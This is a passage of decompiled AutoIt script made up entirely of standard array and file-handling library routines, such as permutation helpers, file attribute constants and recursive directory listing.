] = __ARRAY_STRINGREPEAT (CHRW (32 ) , $IOFFSET ) ENDIF ENDIF $AARRAY [$I ] &= __ARRAY_STRINGREPEAT (CHRW (9608 ) , INT ($N / 8 ) ) $N = MOD ($N , 8 ) IF $N > 0 THEN $AARRAY [$I ] &= CHRW (9608 + 8 - $N ) $AARRAY [$I ] &= " " & $T ELSE $AARRAY [$I ] = "" ENDIF NEXT RETURN $AARRAY ENDFUNC FUNC __ARRAY_STRINGREPEAT ($SSTRING , $IREPEATCOUNT ) $IREPEATCOUNT = INT ($IREPEATCOUNT ) IF STRINGLEN ($SSTRING ) < 1 OR $IREPEATCOUNT <= 0 THEN RETURN SETERROR (1 , 0 , "" ) LOCAL $SRESULT = "" WHILE $IREPEATCOUNT > 1 IF BITAND ($IREPEATCOUNT , 1 ) THEN $SRESULT &= $SSTRING $SSTRING &= $SSTRING $IREPEATCOUNT = BITSHIFT ($IREPEATCOUNT , 1 ) WEND RETURN $SSTRING & $SRESULT ENDFUNC FUNC __ARRAY_EXETERINTERNAL (BYREF $AARRAY , $ISTART , $ISIZE , $SDELIMITER , BYREF $AIDX , BYREF $ARESULT , BYREF $ICOUNT ) IF $ISTART == $ISIZE + 4294967295 THEN FOR $I = 0 TO $ISIZE + 4294967295 $ARESULT [$ICOUNT ] &= $AARRAY [$AIDX [$I ] ] & $SDELIMITER NEXT IF $SDELIMITER <> "" THEN $ARESULT [$ICOUNT ] = STRINGTRIMRIGHT ($ARESULT [$ICOUNT ] , STRINGLEN ($SDELIMITER ) ) $ICOUNT += 1 ELSE LOCAL $ITEMP FOR $I = $ISTART TO $ISIZE + 4294967295 $ITEMP = $AIDX [$I ] $AIDX [$I ] = $AIDX [$ISTART ] $AIDX [$ISTART ] = $ITEMP __ARRAY_EXETERINTERNAL ($AARRAY , $ISTART + 1 , $ISIZE , $SDELIMITER , $AIDX , $ARESULT , $ICOUNT ) $AIDX [$ISTART ] = $AIDX [$I ] $AIDX [$I ] = $ITEMP NEXT ENDIF ENDFUNC FUNC __ARRAY_COMBINATIONS ($IN , $IR ) LOCAL $I_TOTAL = 1 FOR $I = $IR TO 1 STEP + 4294967295 $I_TOTAL *= ($IN / $I ) $IN -= 1 NEXT RETURN ROUND ($I_TOTAL ) ENDFUNC FUNC __ARRAY_GETNEXT ($IN , $IR , BYREF $ILEFT , $ITOTAL , BYREF $AIDX ) IF $ILEFT == $ITOTAL THEN $ILEFT -= 1 RETURN ENDIF LOCAL $I = $IR + 4294967295 WHILE $AIDX [$I ] == $IN - $IR + $I $I -= 1 WEND $AIDX [$I ] += 1 FOR $J = $I + 1 TO $IR + 4294967295 $AIDX [$J ] = $AIDX [$I ] + $J - $I NEXT $ILEFT -= 1 ENDFUNC FUNC __ARRAY_MINMAXINDEX (CONST BYREF $AARRAY , $ICOMPNUMERIC , $ISTART , $IEND , $ISUBITEM , $FUCOMPARISON ) IF $ICOMPNUMERIC = DEFAULT THEN $ICOMPNUMERIC = 0 IF $ICOMPNUMERIC <> 1 THEN $ICOMPNUMERIC = 0 IF $ISTART = DEFAULT THEN $ISTART = 0 IF $IEND = DEFAULT THEN $IEND = 0 IF $ISUBITEM = DEFAULT THEN $ISUBITEM = 0 IF NOT ISARRAY ($AARRAY ) THEN RETURN SETERROR (1 , 0 , + 4294967295 ) LOCAL $IDIM_1 = UBOUND ($AARRAY , $UBOUND_ROWS ) + 4294967295 IF $IDIM_1 < 0 THEN RETURN SETERROR (1 , 0 , + 4294967295 ) IF $IEND = + 4294967295 THEN $IEND = $IDIM_1 IF $ISTART = + 4294967295 THEN $ISTART = 0 IF $ISTART < + 4294967295 OR $IEND < + 4294967295 THEN RETURN SETERROR (3 , 0 , + 4294967295 ) IF $ISTART > $IDIM_1 OR $IEND > $IDIM_1 THEN RETURN SETERROR (3 , 0 , + 4294967295 ) IF $ISTART > $IEND THEN RETURN SETERROR (4 , 0 , + 4294967295 ) IF $IDIM_1 < 0 THEN RETURN SETERROR (5 , 0 , + 4294967295 ) LOCAL $IMAXMININDEX = $ISTART SWITCH UBOUND ($AARRAY , $UBOUND_DIMENSIONS ) CASE 1 IF $ICOMPNUMERIC THEN FOR $I = $ISTART TO $IEND IF $FUCOMPARISON (NUMBER ($AARRAY [$I ] ) , NUMBER ($AARRAY [$IMAXMININDEX ] ) ) THEN $IMAXMININDEX = $I NEXT ELSE FOR $I = $ISTART TO $IEND IF $FUCOMPARISON ($AARRAY [$I ] , $AARRAY [$IMAXMININDEX ] ) THEN $IMAXMININDEX = $I NEXT ENDIF CASE 2 IF $ISUBITEM < 0 OR $ISUBITEM > UBOUND ($AARRAY , $UBOUND_COLUMNS ) + 4294967295 THEN RETURN SETERROR (6 , 0 , + 4294967295 ) IF $ICOMPNUMERIC THEN FOR $I = $ISTART TO $IEND IF $FUCOMPARISON (NUMBER ($AARRAY [$I ] [$ISUBITEM ] ) , NUMBER ($AARRAY [$IMAXMININDEX ] [$ISUBITEM ] ) ) THEN $IMAXMININDEX = $I NEXT ELSE FOR $I = $ISTART TO $IEND IF $FUCOMPARISON ($AARRAY [$I ] [$ISUBITEM ] , $AARRAY [$IMAXMININDEX ] [$ISUBITEM ] ) THEN $IMAXMININDEX = $I NEXT ENDIF CASE ELSE RETURN SETERROR (2 , 0 , + 4294967295 ) ENDSWITCH RETURN $IMAXMININDEX ENDFUNC FUNC __ARRAY_GREATERTHAN ($VVALUE1 , $VVALUE2 ) RETURN $VVALUE1 > $VVALUE2 ENDFUNC FUNC __ARRAY_LESSTHAN ($VVALUE1 , $VVALUE2 ) RETURN $VVALUE1 < $VVALUE2 ENDFUNC FUNC __ARRAYUNIQUE_AUTOERRFUNC () ENDFUNC GLOBAL CONST $FC_NOOVERWRITE = 0 GLOBAL CONST $FC_OVERWRITE = 1 GLOBAL CONST $FC_CREATEPATH = 8 GLOBAL CONST $FT_MODIFIED = 0 GLOBAL CONST $FT_CREATED = 1 GLOBAL CONST $FT_ACCESSED = 2 GLOBAL CONST $FT_ARRAY = 0 GLOBAL CONST $FT_STRING = 1 GLOBAL CONST $FSF_CREATEBUTTON = 1 GLOBAL CONST $FSF_NEWDIALOG = 2 GLOBAL CONST $FSF_EDITCONTROL = 4 GLOBAL CONST $FT_NONRECURSIVE = 0 GLOBAL CONST $FT_RECURSIVE = 1 GLOBAL CONST $FO_READ = 0 GLOBAL CONST $FO_APPEND = 1 GLOBAL CONST $FO_OVERWRITE = 2 GLOBAL CONST $FO_CREATEPATH = 8 GLOBAL CONST $FO_BINARY = 16 GLOBAL CONST $FO_UNICODE = 32 GLOBAL CONST $FO_UTF16_LE = 32 GLOBAL CONST $FO_UTF16_BE = 64 GLOBAL CONST $FO_UTF8 = 128 GLOBAL CONST $FO_UTF8_NOBOM = 256 GLOBAL CONST $FO_ANSI = 512 GLOBAL CONST $FO_UTF16_LE_NOBOM = 1024 GLOBAL CONST $FO_UTF16_BE_NOBOM = 2048 GLOBAL CONST $FO_UTF8_FULL = 16384 GLOBAL CONST $FO_FULLFILE_DETECT = 16384 GLOBAL CONST $EOF = + 4294967295 GLOBAL CONST $FD_FILEMUSTEXIST = 1 GLOBAL CONST $FD_PATHMUSTEXIST = 2 GLOBAL CONST $FD_MULTISELECT = 4 GLOBAL CONST $FD_PROMPTCREATENEW = 8 GLOBAL CONST $FD_PROMPTOVERWRITE = 16 GLOBAL CONST $CREATE_NEW = 1 GLOBAL CONST $CREATE_ALWAYS = 2 GLOBAL CONST $OPEN_EXISTING = 3 GLOBAL CONST $OPEN_ALWAYS = 4 GLOBAL CONST $TRUNCATE_EXISTING = 5 GLOBAL CONST $INVALID_SET_FILE_POINTER = + 4294967295 GLOBAL CONST $FILE_BEGIN = 0 GLOBAL CONST $FILE_CURRENT = 1 GLOBAL CONST $FILE_END = 2 GLOBAL CONST $FILE_ATTRIBUTE_READONLY = 1 GLOBAL CONST $FILE_ATTRIBUTE_HIDDEN = 2 GLOBAL CONST $FILE_ATTRIBUTE_SYSTEM = 4 GLOBAL CONST $FILE_ATTRIBUTE_DIRECTORY = 16 GLOBAL CONST $FILE_ATTRIBUTE_ARCHIVE = 32 GLOBAL CONST $FILE_ATTRIBUTE_DEVICE = 64 GLOBAL CONST $FILE_ATTRIBUTE_NORMAL = 128 GLOBAL CONST $FILE_ATTRIBUTE_TEMPORARY = 256 GLOBAL CONST $FILE_ATTRIBUTE_SPARSE_FILE = 512 GLOBAL CONST $FILE_ATTRIBUTE_REPARSE_POINT = 1024 GLOBAL CONST $FILE_ATTRIBUTE_COMPRESSED = 2048 GLOBAL CONST $FILE_ATTRIBUTE_OFFLINE = 4096 GLOBAL CONST $FILE_ATTRIBUTE_NOT_CONTENT_INDEXED = 8192 GLOBAL CONST $FILE_ATTRIBUTE_ENCRYPTED = 16384 GLOBAL CONST $FILE_SHARE_READ = 1 GLOBAL CONST $FILE_SHARE_WRITE = 2 GLOBAL CONST $FILE_SHARE_DELETE = 4 GLOBAL CONST $FILE_SHARE_READWRITE = BITOR ($FILE_SHARE_READ , $FILE_SHARE_WRITE ) GLOBAL CONST $FILE_SHARE_ANY = BITOR ($FILE_SHARE_READ , $FILE_SHARE_WRITE , $FILE_SHARE_DELETE ) GLOBAL CONST $GENERIC_ALL = 268435456 GLOBAL CONST $GENERIC_EXECUTE = 536870912 GLOBAL CONST $GENERIC_WRITE = 1073741824 GLOBAL CONST $GENERIC_READ = 2147483648 GLOBAL CONST $GENERIC_READWRITE = BITOR ($GENERIC_READ , $GENERIC_WRITE ) GLOBAL CONST $FILE_ENCODING_UTF16LE = 32 GLOBAL CONST $FE_ENTIRE_UTF8 = 1 GLOBAL CONST $FE_PARTIALFIRST_UTF8 = 2 GLOBAL CONST $FN_FULLPATH = 0 GLOBAL CONST $FN_RELATIVEPATH = 1 GLOBAL CONST $FV_COMMENTS = "Comments" GLOBAL CONST $FV_COMPANYNAME = "CompanyName" GLOBAL CONST $FV_FILEDESCRIPTION = "FileDescription" GLOBAL CONST $FV_FILEVERSION = "FileVersion" GLOBAL CONST $FV_INTERNALNAME = "InternalName" GLOBAL CONST $FV_LEGALCOPYRIGHT = "LegalCopyright" GLOBAL CONST $FV_LEGALTRADEMARKS = "LegalTrademarks" GLOBAL CONST $FV_ORIGINALFILENAME = "OriginalFilename" GLOBAL CONST $FV_PRODUCTNAME = "ProductName" GLOBAL CONST $FV_PRODUCTVERSION = "ProductVersion" GLOBAL CONST $FV_PRIVATEBUILD = "PrivateBuild" GLOBAL CONST $FV_SPECIALBUILD = "SpecialBuild" GLOBAL CONST $FRTA_NOCOUNT = 0 GLOBAL CONST $FRTA_COUNT = 1 GLOBAL CONST $FRTA_INTARRAYS = 2 GLOBAL CONST $FRTA_ENTIRESPLIT = 4 GLOBAL CONST $FLTA_FILESFOLDERS = 0 GLOBAL CONST $FLTA_FILES = 1 GLOBAL CONST $FLTA_FOLDERS = 2 GLOBAL CONST $FLTAR_FILESFOLDERS = 0 GLOBAL CONST $FLTAR_FILES = 1 GLOBAL CONST $FLTAR_FOLDERS = 2 GLOBAL CONST $FLTAR_NOHIDDEN = 4 GLOBAL CONST $FLTAR_NOSYSTEM = 8 GLOBAL CONST $FLTAR_NOLINK = 16 GLOBAL CONST $FLTAR_NORECUR = 0 GLOBAL CONST $FLTAR_RECUR = 1 GLOBAL CONST $FLTAR_NOSORT = 0 GLOBAL CONST $FLTAR_SORT = 1 GLOBAL CONST $FLTAR_FASTSORT = 2 GLOBAL CONST $FLTAR_NOPATH = 0 GLOBAL CONST $FLTAR_RELPATH = 1 GLOBAL CONST $FLTAR_FULLPATH = 2 FUNC _FILECOUNTLINES ($SFILEPATH ) LOCAL $HFILEOPEN = FILEOPEN ($SFILEPATH , $FO_READ ) IF $HFILEOPEN = + 4294967295 THEN RETURN SETERROR (1 , 0 , 0 ) LOCAL $SFILEREAD = STRINGSTRIPWS (FILEREAD ($HFILEOPEN ) , $STR_STRIPTRAILING ) FILECLOSE ($HFILEOPEN ) RETURN UBOUND (STRINGREGEXP ($SFILEREAD , "\R" , $STR_REGEXPARRAYGLOBALMATCH ) ) + 1 - INT ($SFILEREAD = "" ) ENDFUNC FUNC _FILECREATE ($SFILEPATH ) LOCAL $HFILEOPEN = FILEOPEN ($SFILEPATH , BITOR ($FO_OVERWRITE , $FO_CREATEPATH ) ) IF $HFILEOPEN = + 4294967295 THEN RETURN SETERROR (1 , 0 , 0 ) LOCAL $IFILEWRITE = FILEWRITE ($HFILEOPEN , "" ) FILECLOSE ($HFILEOPEN ) IF NOT $IFILEWRITE THEN RETURN SETERROR (2 , 0 , 0 ) RETURN 1 ENDFUNC FUNC _FILELISTTOARRAY ($SFILEPATH , $SFILTER = "*" , $IFLAG = $FLTA_FILESFOLDERS , $BRETURNPATH = FALSE ) LOCAL $SDELIMITER = "|" , $SFILELIST = "" , $SFILENAME = "" , $SFULLPATH = "" $SFILEPATH = STRINGREGEXPREPLACE ($SFILEPATH , "[\\/]+$" , "" ) & "\" IF $IFLAG = DEFAULT THEN $IFLAG = $FLTA_FILESFOLDERS IF $BRETURNPATH THEN $SFULLPATH = $SFILEPATH IF $SFILTER = DEFAULT THEN $SFILTER = "*" IF NOT FILEEXISTS ($SFILEPATH ) THEN RETURN SETERROR (1 , 0 , 0 ) IF STRINGREGEXP ($SFILTER , "[\\/:><\|]|(?s)^\s*$" ) THEN RETURN SETERROR (2 , 0 , 0 ) IF NOT ($IFLAG = 0 OR $IFLAG = 1 OR $IFLAG = 2 ) THEN RETURN SETERROR (3 , 0 , 0 ) LOCAL $HSEARCH = FILEFINDFIRSTFILE ($SFILEPATH & $SFILTER ) IF @ERROR THEN RETURN SETERROR (4 , 0 , 0 ) WHILE 1 $SFILENAME = FILEFINDNEXTFILE ($HSEARCH ) IF @ERROR THEN EXITLOOP IF ($IFLAG + @EXTENDED = 2 ) THEN CONTINUELOOP $SFILELIST &= $SDELIMITER & $SFULLPATH & $SFILENAME WEND FILECLOSE ($HSEARCH ) IF $SFILELIST = "" THEN RETURN SETERROR (4 , 0 , 0 ) RETURN STRINGSPLIT (STRINGTRIMLEFT ($SFILELIST , 1 ) , $SDELIMITER ) ENDFUNC FUNC _FILELISTTOARRAYREC ($SFILEPATH , $SMASK = "*" , $IRETURN = $FLTAR_FILESFOLDERS , $IRECUR = $FLTAR_NORECUR , $ISORT = $FLTAR_NOSORT , $IRETURNPATH = $FLTAR_RELPATH ) IF NOT FILEEXISTS ($SFILEPATH ) THEN RETURN SETERROR (1 , 1 , "" ) IF $SMASK = DEFAULT THEN $SMASK = "*" IF $IRETURN = DEFAULT THEN $IRETURN = $FLTAR_FILESFOLDERS IF $IRECUR = DEFAULT THEN $IRECUR = $FLTAR_NORECUR IF $ISORT = DEFAULT THEN $ISORT = $FLTAR_NOSORT IF $IRETURNPATH = DEFAULT THEN $IRETURNPATH = $FLTAR_RELPATH IF $IRECUR > 1 OR NOT ISINT ($IRECUR ) THEN RETURN SETERROR (1 , 6 , "" ) LOCAL $BLONGPATH = FALSE IF STRINGLEFT ($SFILEPATH , 4 ) == "\\?\" THEN $BLONGPATH = TRUE ENDIF LOCAL $SFOLDERSLASH = "" IF STRINGRIGHT ($SFILEPATH , 1 ) = "\" THEN $SFOLDERSLASH = "\" ELSE $SFILEPATH = $SFILEPATH & "\" ENDIF LOCAL $ASFOLDERSEARCHLIST [100 ] = [1 ] $ASFOLDERSEARCHLIST [1 ] = $SFILEPATH LOCAL $IHIDE_HS = 0 , $SHIDE_HS = "" IF BITAND ($IRETURN , 4 ) THEN $IHIDE_HS += 2 $SHIDE_HS &= "H" $IRETURN -= 4 ENDIF IF BITAND ($IRETURN , 8 ) THEN $IHIDE_HS += 4 $SHIDE_HS &= "S" $IRETURN -= 8 ENDIF LOCAL $IHIDE_LINK = 0 IF BITAND ($IRETURN , 16 ) THEN $IHIDE_LINK = 1024 $IRETURN -= 16 ENDIF LOCAL $IMAXLEVEL = 0 IF $IRECUR < 0 THEN STRINGREPLACE ($SFILEPATH , "\" , "" , 0 , $STR_NOCASESENSEBASIC ) $IMAXLEVEL = @EXTENDED - $IRECUR ENDIF LOCAL $SEXCLUDE_LIST = "" , $SEXCLUDE_LIST_FOLDER = "" , $SINCLUDE_LIST = "*" LOCAL $AMASKSPLIT = STRINGSPLIT ($SMASK , "|" ) SWITCH $AMASKSPLIT [0 ] CASE 3 $SEXCLUDE_LIST_FOLDER = $AMASKSPLIT [3 ] CONTINUECASE CASE 2 $SEXCLUDE_LIST = $AMASKSPLIT [2 ] CONTINUECASE CASE 1 $SINCLUDE_LIST = $AMASKSPLIT [1 ] ENDSWITCH LOCAL $SINCLUDE_FILE_MASK = ".+" IF $SINCLUDE_LIST <> "*" THEN IF NOT __FLTAR_LISTTOMASK ($SINCLUDE_FILE_MASK , $SINCLUDE_LIST ) THEN RETURN SETERROR (1 , 2 , "" ) ENDIF LOCAL $SINCLUDE_FOLDER_MASK = ".+" SWITCH $IRETURN CASE 0 SWITCH $IRECUR CASE 0 $SINCLUDE_FOLDER_MASK = $SINCLUDE_FILE_MASK ENDSWITCH CASE 2 $SINCLUDE_FOLDER_MASK = $SINCLUDE_FILE_MASK ENDSWITCH LOCAL $SEXCLUDE_FILE_MASK = ":" IF $SEXCLUDE_LIST <> "" THEN IF NOT __FLTAR_LISTTOMASK ($SEXCLUDE_FILE_MASK , $SEXCLUDE_LIST ) THEN RETURN SETERROR (1 , 3 , "" ) ENDIF LOCAL $SEXCLUDE_FOLDER_MASK = ":" IF $IRECUR THEN IF $SEXCLUDE_LIST_FOLDER THEN IF NOT __FLTAR_LISTTOMASK ($SEXCLUDE_FOLDER_MASK , $SEXCLUDE_LIST_FOLDER ) THEN RETURN SETERROR (1 , 4 , "" ) ENDIF IF $IRETURN = 2 THEN $SEXCLUDE_FOLDER_MASK = $SEXCLUDE_FILE_MASK ENDIF ELSE $SEXCLUDE_FOLDER_MASK = $SEXCLUDE_FILE_MASK ENDIF IF NOT ($IRETURN = 0 OR $IRETURN = 1 OR $IRETURN = 2 ) THEN RETURN SETERROR (1 , 5 , "" ) IF NOT ($ISORT = 0 OR $ISORT = 1 OR $ISORT = 2 ) THEN RETURN SETERROR (1 , 7 , "" ) IF NOT ($IRETURNPATH = 0 OR $IRETURNPATH = 1 OR $IRETURNPATH = 2 ) THEN RETURN SETERROR (1 , 8 , "" ) IF $IHIDE_LINK THEN LOCAL $TFILE_DATA = DLLSTRUCTCREATE ("struct;align 4;dword FileAttributes;uint64 CreationTime;uint64 LastAccessTime;uint64 LastWriteTime;" & "dword FileSizeHigh;dword FileSizeLow;dword Reserved0;dword Reserved1;wchar FileName[260];wchar AlternateFileName[14];endstruct" ) LOCAL $HDLL = DLLOPEN ("kernel32.dll" ) , $ADLL_RET ENDIF LOCAL $ASRETURNLIST [100 ] = [0 ] LOCAL $ASFILEMATCHLIST = $ASRETURNLIST , $ASROOTFILEMATCHLIST = $ASRETURNLIST , $ASFOLDERMATCHLIST = $ASRETURNLIST LOCAL $BFOLDER = FALSE , $HSEARCH = 0 , $SCURRENTPATH = "" , $SNAME = "" , $SRETPATH = "" LOCAL $IATTRIBS = 0 , $SATTRIBS = "" LOCAL $ASFOLDERFILESECTIONLIST [100 ] [2 ] = [[0 , 0 ] ] WHILE $ASFOLDERSEARCHLIST [0 ] > 0 $SCURRENTPATH = $ASFOLDERSEARCHLIST [$ASFOLDERSEARCHLIST [0 ] ] $ASFOLDERSEARCHLIST [0 ] -= 1 SWITCH $IRETURNPATH CASE 1 $SRETPATH = STRINGREPLACE ($SCURRENTPATH , $SFILEPATH , "" ) CASE 2 IF $BLONGPATH THEN $SRETPATH = STRINGTRIMLEFT ($SCURRENTPATH , 4 ) ELSE $SRETPATH = $SCURRENTPATH ENDIF ENDSWITCH IF $IHIDE_LINK THEN $ADLL_RET = DLLCALL ($HDLL , "handle" , "FindFirstFileW" , "wstr" , $SCURRENTPATH & "*" , "struct*" , $TFILE_DATA ) IF @ERROR OR NOT $ADLL_RET [0 ] THEN CONTINUELOOP ENDIF $HSEARCH = $ADLL_RET [0 ] ELSE $HSEARCH = FILEFINDFIRSTFILE ($SCURRENTPATH & "*" ) IF $HSEARCH = + 4294967295 THEN CONTINUELOOP ENDIF ENDIF IF $IRETURN = 0 AND $ISORT AND $IRETURNPATH THEN __FLTAR_ADDTOLIST ($ASFOLDERFILESECTIONLIST , $SRETPATH , $ASFILEMATCHLIST [0 ] + 1 ) ENDIF $SATTRIBS = "" WHILE 1 IF $IHIDE_LINK THEN $ADLL_RET = DLLCALL ($HDLL , "int" , "FindNextFileW" , "handle" , $HSEARCH , "struct*" , $TFILE_DATA ) IF @ERROR OR NOT $ADLL_RET [0 ] THEN EXITLOOP ENDIF $SNAME = DLLSTRUCTGETDATA ($TFILE_DATA , "FileName" ) IF $SNAME = ".." THEN CONTINUELOOP ENDIF $IATTRIBS = DLLSTRUCTGETDATA ($TFILE_DATA , "FileAttributes" ) IF $IHIDE_HS AND BITAND ($IATTRIBS , $IHIDE_HS ) THEN CONTINUELOOP ENDIF IF BITAND ($IATTRIBS , $IHIDE_LINK ) THEN CONTINUELOOP ENDIF $BFOLDER = FALSE IF BITAND ($IATTRIBS , 16 ) THEN $BFOLDER = TRUE ENDIF ELSE $BFOLDER = FALSE $SNAME = FILEFINDNEXTFILE ($HSEARCH , 1 ) IF @ERROR THEN EXITLOOP ENDIF $SATTRIBS = @EXTENDED IF STRINGINSTR ($SATTRIBS , "D" ) THEN $BFOLDER = TRUE ENDIF IF STRINGREGEXP ($SATTRIBS , "[" & $SHIDE_HS & "]" ) THEN CONTINUELOOP ENDIF ENDIF IF $BFOLDER THEN SELECT CASE $IRECUR < 0 STRINGREPLACE ($SCURRENTPATH , "\" , "" , 0 , $STR_NOCASESENSEBASIC ) IF @EXTENDED < $IMAXLEVEL THEN CONTINUECASE ENDIF CASE $IRECUR = 1 IF NOT STRINGREGEXP ($SNAME , $SEXCLUDE_FOLDER_MASK ) THEN __FLTAR_ADDTOLIST ($ASFOLDERSEARCHLIST , $SCURRENTPATH & $SNAME & "\" ) ENDIF ENDSELECT ENDIF IF $ISORT THEN IF $BFOLDER THEN IF STRINGREGEXP ($SNAME , $SINCLUDE_FOLDER_MASK ) AND NOT STRINGREGEXP ($SNAME , $SEXCLUDE_FOLDER_MASK ) THEN __FLTAR_ADDTOLIST ($ASFOLDERMATCHLIST , $SRETPATH & $SNAME & $SFOLDERSLASH ) ENDIF ELSE IF STRINGREGEXP ($SNAME , $SINCLUDE_FILE_MASK ) AND NOT STRINGREGEXP ($SNAME , $SEXCLUDE_FILE_MASK ) THEN IF $SCURRENTPATH = $SFILEPATH THEN __FLTAR_ADDTOLIST ($ASROOTFILEMATCHLIST , $SRETPATH & $SNAME ) ELSE __FLTAR_ADDTOLIST ($ASFILEMATCHLIST , $SRETPATH & $SNAME ) ENDIF ENDIF ENDIF ELSE IF $BFOLDER THEN IF $IRETURN <> 1 AND STRINGREGEXP ($SNAME , $SINCLUDE_FOLDER_MASK ) AND NOT STRINGREGEXP ($SNAME , $SEXCLUDE_FOLDER_MASK ) THEN __FLTAR_ADDTOLIST ($ASRETURNLIST , $SRETPATH & $SNAME & $SFOLDERSLASH ) ENDIF ELSE IF $IRETURN <> 2 AND STRINGREGEXP ($SNAME , $SINCLUDE_FILE_MASK ) AND NOT STRINGREGEXP ($SNAME , $SEXCLUDE_FILE_MASK ) THEN __FLTAR_ADDTOLIST ($ASRETURNLIST , $SRETPATH & $SNAME ) ENDIF ENDIF ENDIF WEND IF $IHIDE_LINK THEN DLLCALL ($HDLL , "int" , "FindClose" , "ptr" , $HSEARCH ) ELSE FILECLOSE ($HSEARCH ) ENDIF WEND IF $IHIDE_LINK THEN DLLCLOSE ($HDLL ) ENDIF IF $ISORT THEN SWITCH $IRETURN CASE 2 IF $ASFOLDERMATCHLIST [0 ] = 0 THEN RETURN SETERROR (1 , 9 , "" ) REDIM $ASFOLDERMATCHLIST [$ASFOLDERMATCHLIST [0 ] + 1 ] $ASRETURNLIST = $ASFOLDERMATCHLIST __ARRAYDUALPIVOTSORT ($ASRETURNLIST , 1 , $ASRETURNLIST [0 ] ) CASE 1 IF $ASROOTFILEMATCHLIST [0 ] = 0 AND $ASFILEMATCHLIST [0 ] = 0 THEN RETURN SETERROR (1 , 9 , "" ) IF $IRETURNPATH = 0 THEN __FLTAR_ADDFILELISTS ($ASRETURNLIST , $ASROOTFILEMATCHLIST , $ASFILEMATCHLIST ) __ARRAYDUALPIVOTSORT ($ASRETURNLIST , 1 , $ASRETURNLIST [0 ] ) ELSE __FLTAR_ADDFILELISTS ($ASRETURNLIST , $ASROOTFILEMATCHLIST , $ASFILEMATCHLIST , 1 ) ENDIF CASE 0 IF $ASROOTFILEMATCHLIST [0 ] = 0 AND $ASFOLDERMATCHLIST [0 ] = 0 THEN RETURN SETERROR (1 , 9 , "" ) IF $IRETURNPATH = 0 THEN __FLTAR_ADDFILELISTS ($ASRETURNLIST , $ASROOTFILEMATCHLIST , $ASFILEMATCHLIST ) $ASRETURNLIST [0 ] += $ASFOLDERMATCHLIST [0 ] REDIM $ASFOLDERMATCHLIST [$ASFOLDERMATCHLIST [0 ] + 1 ] _ARRAYCONCATENATE ($ASRETURNLIST , $ASFOLDERMATCHLIST , 1 ) __ARRAYDUALPIVOTSORT ($ASRETURNLIST , 1 , $ASRETURNLIST [0 ] ) ELSE LOCAL $ASRETURNLIST [$ASFILEMATCHLIST [0 ] + $ASROOTFILEMATCHLIST [0 ] + $ASFOLDERMATCHLIST [0 ] + 1 ] $ASRETURNLIST [0 ] = $ASFILEMATCHLIST [0 ] + $ASROOTFILEMATCHLIST [0 ] + $ASFOLDERMATCHLIST [0 ] __ARRAYDUALPIVOTSORT ($ASROOTFILEMATCHLIST , 1 , $ASROOTFILEMATCHLIST [0 ] ) FOR $I = 1 TO $ASROOTFILEMATCHLIST [0 ] $ASRETURNLIST [$I ] = $ASROOTFILEMATCHLIST [$I ] NEXT LOCAL $INEXTINSERTIONINDEX = $ASROOTFILEMATCHLIST [0 ] + 1 __ARRAYDUALPIVOTSORT ($ASFOLDERMATCHLIST , 1 , $ASFOLDERMATCHLIST [0 ] ) LOCAL $SFOLDERTOFIND = "" FOR $I = 1 TO $ASFOLDERMATCHLIST [0 ] $ASRETURNLIST [$INEXTINSERTIONINDEX ] = $ASFOLDERMATCHLIST [$I ] $INEXTINSERTIONINDEX += 1 IF $SFOLDERSLASH THEN $SFOLDERTOFIND = $ASFOLDERMATCHLIST [$I ] ELSE $SFOLDERTOFIND = $ASFOLDERMATCHLIST [$I ] & "\" ENDIF LOCAL $IFILESECTIONENDINDEX = 0 , $IFILESECTIONSTARTINDEX = 0 FOR $J = 1 TO $ASFOLDERFILESECTIONLIST [0 ] [0 ] IF $SFOLDERTOFIND = $ASFOLDERFILESECTIONLIST [$J ] [0 ] THEN $IFILESECTIONSTARTINDEX = $ASFOLDERFILESECTIONLIST [$J ] [1 ] IF $J = $ASFOLDERFILESECTIONLIST [0 ] [0 ] THEN $IFILESECTIONENDINDEX = $ASFILEMATCHLIST [0 ] ELSE $IFILESECTIONENDINDEX = $ASFOLDERFILESECTIONLIST [$J + 1 ] [1 ] + 4294967295 ENDIF IF $ISORT = 1 THEN __ARRAYDUALPIVOTSORT ($ASFILEMATCHLIST , $IFILESECTIONSTARTINDEX , $IFILESECTIONENDINDEX ) ENDIF FOR $K = $IFILESECTIONSTARTINDEX TO $IFILESECTIONENDINDEX $ASRETURNLIST [$INEXTINSERTIONINDEX ] = $ASFILEMATCHLIST [$K ] $INEXTINSERTIONINDEX += 1 NEXT EXITLOOP ENDIF NEXT NEXT ENDIF ENDSWITCH ELSE IF $ASRETURNLIST [0 ] = 0 THEN RETURN SETERROR (1 , 9 , "" ) REDIM $ASRETURNLIST [$ASRETURNLIST [0 ] + 1 ] ENDIF RETURN $ASRETURNLIST ENDFUNC FUNC __FLTAR_ADDFILELISTS (BYREF $ASTARGET , $ASSOURCE_1 , $ASSOURCE_2 , $ISORT = 0 ) REDIM $ASSOURCE_1 [$ASSOURCE_1 [0 ] + 1 ] IF $ISORT = 1 THEN __ARRAYDUALPIVOTSORT ($ASSOURCE_1 , 1 , $ASSOURCE_1 [0 ] ) $ASTARGET = $ASSOURCE_1 $ASTARGET [0 ] += $ASSOURCE_2 [0 ] REDIM $ASSOURCE_2 [$ASSOURCE_2 [0 ] + 1 ] IF $ISORT = 1 THEN __ARRAYDUALPIVOTSORT ($ASSOURCE_2 , 1 , $ASSOURCE_2 [0 ] ) _ARRAYCONCATENATE ($ASTARGET , $ASSOURCE_2 , 1 ) ENDFUNC FUNC __FLTAR_ADDTOLIST (BYREF $ALIST , $VVALUE_0 , $VVALUE_1 = + 4294967295 ) IF $VVALUE_1 = + 4294967295 THEN $ALIST [0 ] += 1 IF UBOUND ($ALIST ) <= $ALIST [0 ] THEN REDIM $ALIST [UBOUND ($ALIST ) * 2 ] $ALIST [$ALIST [0 ] ] = $VVALUE_0 ELSE $ALIST [0 ] [0 ] += 1 IF UBOUND ($ALIST ) <= $ALIST [0 ] [0 ] THEN REDIM $ALIST [UBOUND ($ALIST ) * 2 ] [2 ] $ALIST [$ALIST [0 ] [0 ] ] [0 ] = $VVALUE_0 $ALIST [$ALIST [0 ] [0 ] ] [1 ] = $VVALUE_1 ENDIF ENDFUNC FUNC __FLTAR_LISTTOMASK (BYREF $SMASK , $SLIST ) IF STRINGREGEXP ($SLIST , "\\|/|:|\<|\>|\|" ) THEN RETURN 0 $SLIST = STRINGREPLACE (STRINGSTRIPWS (STRINGREGEXPREPLACE ($SLIST , "\s*;\s*" , ";" ) , $STR_STRIPLEADING + $STR_STRIPTRAILING ) , ";" , "|" ) $SLIST = STRINGREPLACE 